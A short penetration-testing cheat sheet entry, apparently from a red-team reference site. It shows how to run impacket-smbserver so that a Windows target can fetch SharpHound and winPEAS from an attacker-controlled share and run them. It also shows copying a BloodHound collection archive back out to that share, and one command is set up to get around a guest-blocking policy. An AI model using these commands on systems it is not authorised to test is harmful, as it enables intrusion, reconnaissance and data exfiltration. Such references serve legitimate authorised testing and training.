>_ shadow.red

impacket-smbserver - Stage Files and Run In-Memory

Privilege Escalation Windows Misc linux windows

Anonymous share

impacket-smbserver share ./ -smb2support

With user (avoids guest-block GPO)

impacket-smbserver share ./ -smb2support -user test -pass ""

Mount on the Windows target

net use \\192.168.119.231\share /USER:test

Use the share from Windows

copy \\192.168.168.168\share\SharpHound.exe
\\192.168.168.168\share\winPEASany.exe
copy 20220424074629_BloodHound.zip \\192.168.119.213\share
net use * /del /y